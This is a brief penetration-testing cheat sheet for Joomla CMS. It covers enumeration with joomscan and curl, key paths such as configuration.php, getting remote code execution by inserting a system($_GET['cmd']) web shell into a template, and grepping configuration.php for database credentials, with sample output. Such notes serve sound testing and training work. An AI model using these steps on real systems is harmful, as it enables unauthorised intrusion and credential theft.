Joomla

What it is: Popular open-source CMS, third most used after WordPress and Drupal. Extensions and components are the main attack surface. Admin panel at /administrator/.

Default ports: 80, 443

Vuln research:


Enumerate Joomla

Version, components, and configuration files — Use joomscan

joomscan -u http://$IP/
curl -s http://$IP/administrator/manifests/files/joomla.xml | grep version

Joomla default paths

Key files and directories — Check all of these

/administrator/          # Admin login
/configuration.php       # DB creds (if readable)
/README.txt             # Version info
/robots.txt             # Hidden paths

RCE via Template Editing

Edit a template PHP file — Requires admin access

# Extensions → Templates → Templates → Protostar → index.php
# Add: system($_GET['cmd']);
# Visit: http://$IP/index.php?cmd=id

Joomla configuration.php

Contains database credentials — Check for password reuse

cat /var/www/html/configuration.php | grep -E "(user|password|host|db)"
Example Output
public $user = 'joomla_admin';
public $password = 'J00mla_Sup3r!';
public $db = 'joomla_db';